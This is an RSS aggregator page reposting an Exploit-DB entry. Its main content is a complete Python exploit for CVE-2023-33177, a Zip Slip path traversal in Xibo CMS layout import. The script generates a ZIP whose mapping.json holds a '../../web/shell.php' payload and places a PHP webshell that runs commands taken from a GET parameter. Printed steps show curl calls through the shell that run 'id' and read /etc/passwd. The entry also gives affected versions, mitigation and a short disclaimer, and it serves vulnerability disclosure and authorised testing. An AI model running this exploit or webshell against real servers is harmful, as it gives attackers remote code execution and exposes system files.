惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

H
Hackread – Cybersecurity News, Data Breaches, AI and More
C
Check Point Blog
Hacker News: Ask HN
Hacker News: Ask HN
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
WordPress大学
WordPress大学
P
Proofpoint News Feed
V
Visual Studio Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
N
Netflix TechBlog - Medium
C
CXSECURITY Database RSS Feed - CXSecurity.com
博客园 - 聂微东
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
博客园 - 叶小钗
Cisco Talos Blog
Cisco Talos Blog
S
Schneier on Security
T
Threat Research - Cisco Blogs
腾讯CDC
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
The Hacker News
The Hacker News
Google DeepMind News
Google DeepMind News
Microsoft Security Blog
Microsoft Security Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
GbyAI
GbyAI
N
News | PayPal Newsroom
L
LINUX DO - 最新话题
酷 壳 – CoolShell
酷 壳 – CoolShell
P
Palo Alto Networks Blog
T
Tenable Blog
S
Secure Thoughts
T
Threatpost
V2EX - 技术
V2EX - 技术
大猫的无限游戏
大猫的无限游戏
Martin Fowler
Martin Fowler
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Vercel News
Vercel News
罗磊的独立博客
P
Privacy & Cybersecurity Law Blog
Engineering at Meta
Engineering at Meta
小众软件
小众软件
Google DeepMind News
Google DeepMind News
N
News and Events Feed by Topic
Y
Y Combinator Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
C
Cybersecurity and Infrastructure Security Agency CISA
P
Proofpoint News Feed
L
Lohrmann on Cybersecurity
P
Privacy International News Feed
H
Heimdal Security Blog
量子位
B
Blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
complexusprada · 2026-04-08 · via Exploit-DB.com RSS Feed
# Exploit Title: XiboCMS 3.3.4-  Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps

"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.

# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell

# Vulnerability Chain:
# ZIP contains:  library/../../web/shell.php
# Mapping.json:  {"file": "../../web/shell.php", ...}
# Xibo reads:    library/ + ../../web/shell.php
# Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
# Result:        /var/www/cms/web/shell.php (webshell in web root!)

# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4

# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'

# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)

# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""

import zipfile
import json
import sys

def create_exploit():
    """Generate the malicious ZIP file for Xibo CMS RCE exploit"""

    print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
    print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
    print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")

    # Valid Xibo 3.0 layout structure
    # This ensures the ZIP passes initial validation checks
    layout_json = {
        "layout": "Exploit Layout",
        "description": "Path Traversal Test",
        "layoutDefinitions": {
            "schemaVersion": 3,
            "width": 1920,
            "height": 1080,
            "backgroundColor": "#000000",
            "backgroundzIndex": 0,
            "code": "CVE-2023-33177",
            "actions": [],
            "regions": [],
            "drawers": []
        }
    }

    # Empty playlist - triggers JSON import code path
    playlist_json = {}

    # VULNERABILITY: Path traversal in mapping.json
    # The 'file' field is not properly sanitized before file extraction
    # Xibo constructs the extraction path as: library/temp/ + file['file']
    # Using ../../ allows escaping the library directory
    mapping_json = [{
        "file": "../../web/shell.php",  # Path traversal payload
        "name": "shell.php",
        "type": "module"
    }]

    # Simple PHP webshell for command execution
    # Accepts commands via GET parameter: ?cmd=<command>
    webshell = b'<?php system($_GET["cmd"]); ?>'

    # Create the malicious ZIP file
    try:
        with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
            # Add required Xibo layout files
            zf.writestr('layout.json', json.dumps(layout_json, indent=2))
            zf.writestr('playlist.json', json.dumps(playlist_json))
            zf.writestr('mapping.json', json.dumps(mapping_json))

            # CRITICAL: The file path in the ZIP must match what Xibo expects
            # Xibo calls: $zip->getStream('library/' . $file['file'])
            # Therefore we place the file at: library/../../web/shell.php
            zf.writestr('library/../../web/shell.php', webshell)

        print("[+] Exploit ZIP created successfully: exploit.zip")
        print("\n[*] Exploitation Steps:")
        print("    1. Log in to Xibo CMS with valid credentials")
        print("    2. Navigate to: Design → Layouts → Import")
        print("    3. Upload exploit.zip")
        print("    4. Ignore any JSON errors (file is already written)")
        print("    5. Access webshell: http://<target>/shell.php?cmd=<command>")
        print("\n[*] Example:")
        print("    curl 'http://target/shell.php?cmd=id'")
        print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
        print()

    except Exception as e:
        print(f"[-] Error creating exploit: {e}", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    create_exploit()